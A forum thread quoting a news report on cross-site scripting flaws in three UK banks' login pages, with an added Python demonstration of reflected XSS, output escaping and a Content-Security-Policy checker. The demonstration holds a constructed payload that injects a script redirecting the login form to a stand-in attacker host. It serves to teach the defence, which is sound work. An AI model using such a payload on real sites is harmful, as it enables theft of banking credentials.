HELLFIRE
MVM
join:2009-11-25

3 recommendations

Banking is secure because it's HTTPS,right? Weeeeeell...

»www.theregister.co.uk/20 ··· nsecure/
quote:
Each of the three LBG banks – Lloyds, Halifax, and Bank of Scotland – has implemented transport layer security by running https so that transactions run to a secure server. But the three financial institutions are nonetheless vulnerable to a common class of web security vulnerability often exploited by phishing fraudsters: cross-site scripting (XSS) flaws. A software developer and an infosec researcher have separately said that websites maintained by Lloyds, Halifax, and Bank of Scotland all have an XSS vuln, allowing attackers to read and modify the contents of the login form, as well as subsequent pages such as account information in secure banking sessions. Halifax Bank rates a "B" on security headers, which may on the surface seem like a passing grade but belies the problem. The devil lies in the detail, according to (Paul) Moore. "A 'B' isn't bad, but the difference between an 'A' and 'B' here is the existence of a CSP [Content Security Policy] header. If they disallowed inline scripts, they'd get an 'A' and wouldn't be vulnerable to this attack," Moore said.
Reminds me of every other "I'm safe from [insert threat here], I've a [insert defence here]!" statement. Till you get into the nuts and bolts AND the people that actually know what they're talking about...

Now I wonder who else may have this vulnerability AND is passing critical information through it that'd be of interest to nefarious actor(s)?

Regards
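To make the quoted point concrete, here is an added example (not from the article, the banks, or the poster): a constructed login page that reflects a query parameter into its form, the escaped version of the same page, and a small checker that parses a Content-Security-Policy header and answers the one question Moore raises, namely whether the response would let an injected inline script run. The page markup, the `ref` parameter, the payload and the policy strings are all made up for illustration; the checker is a simplified reading of CSP's script-src / default-src fallback and 'unsafe-inline' rules, not the scoring used by any real header-grading site.

```python
"""Reflected XSS in a login form, and the CSP that would have blocked it.

Constructed example. The template, the 'ref' parameter and the payload are
placeholders; nothing here is taken from a real bank site. Standard library only.
"""
import html

# Hypothetical login page that echoes a 'ref' query parameter into a hidden input.
LOGIN_TEMPLATE = """<html><body>
<form action="/login" method="post">
  <input type="hidden" name="ref" value="{ref}">
  <input name="user"><input type="password" name="pass">
</form></body></html>"""

# Constructed attacker input: closes the value attribute, injects an inline script
# that re-points the form at the attacker's host, then re-opens an input.
PAYLOAD = '"><script>document.forms[0].action="https://attacker.example/"</script><input value="'

# Hardened policy: scripts only from our own origin, no inline script or handlers.
HARDENED_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"


def render_login(ref: str, escape_output: bool) -> str:
    """Build the page. escape_output=False reproduces the vulnerable behaviour."""
    value = html.escape(ref, quote=True) if escape_output else ref
    return LOGIN_TEMPLATE.format(ref=value)


def parse_csp(header: str) -> dict:
    """Parse a CSP header into {directive: [source expressions]} (lower-cased)."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if parts:
            policy[parts[0].lower()] = [p.lower() for p in parts[1:]]
    return policy


def inline_scripts_allowed(headers: dict) -> bool:
    """True if a browser would execute an injected inline <script> in this response.

    Rules applied (simplified from the CSP spec):
      * no CSP header at all             -> inline scripts run
      * script-src absent                -> fall back to default-src
      * neither directive present        -> no script restriction, inline runs
      * 'unsafe-inline' listed           -> inline runs, unless a nonce or hash
                                            source is also listed, in which case
                                            browsers ignore 'unsafe-inline'
    """
    csp = next((v for k, v in headers.items()
                if k.lower() == "content-security-policy"), None)
    if csp is None:
        return True
    policy = parse_csp(csp)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources
    )
    return "'unsafe-inline'" in sources and not has_nonce_or_hash


def build_response(ref: str, hardened: bool):
    """Return (headers, body) for GET /login?ref=... in either configuration.

    The hardened variant does both fixes: output encoding removes the injection,
    and the CSP header is the defence in depth that stops the inline script even
    if some other page forgets to encode.
    """
    headers = {"Content-Type": "text/html; charset=utf-8"}
    if hardened:
        headers["Content-Security-Policy"] = HARDENED_CSP
    return headers, render_login(ref, escape_output=hardened)


if __name__ == "__main__":
    for hardened in (False, True):
        hdrs, body = build_response(PAYLOAD, hardened)
        print("hardened" if hardened else "vulnerable",
              "| injected <script> present:", "<script>" in body,
              "| inline scripts allowed by CSP:", inline_scripts_allowed(hdrs))
```

The vulnerable response has the injected `<script>` in the body and no CSP, so it runs; the hardened response has the tag encoded to `&lt;script&gt;` and, independently, a `script-src 'self'` policy under which the browser would refuse an inline script anyway. That second property is the whole difference Moore describes: the header costs nothing to add and turns a reflected-XSS bug into a blocked request rather than a stolen login. Note the caveat built into the checker: a policy that bolts `'unsafe-inline'` onto `script-src` "to make the old code work" gets a CSP header but none of the protection.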

StuartMW
Premium Member
join:2000-08-06

2 recommendations

Halifax, now where have I heard that name before? Oh yeah...

»UK Halifax Bank says has right to portscan your computer "for security"

. o O (Oh the ironing)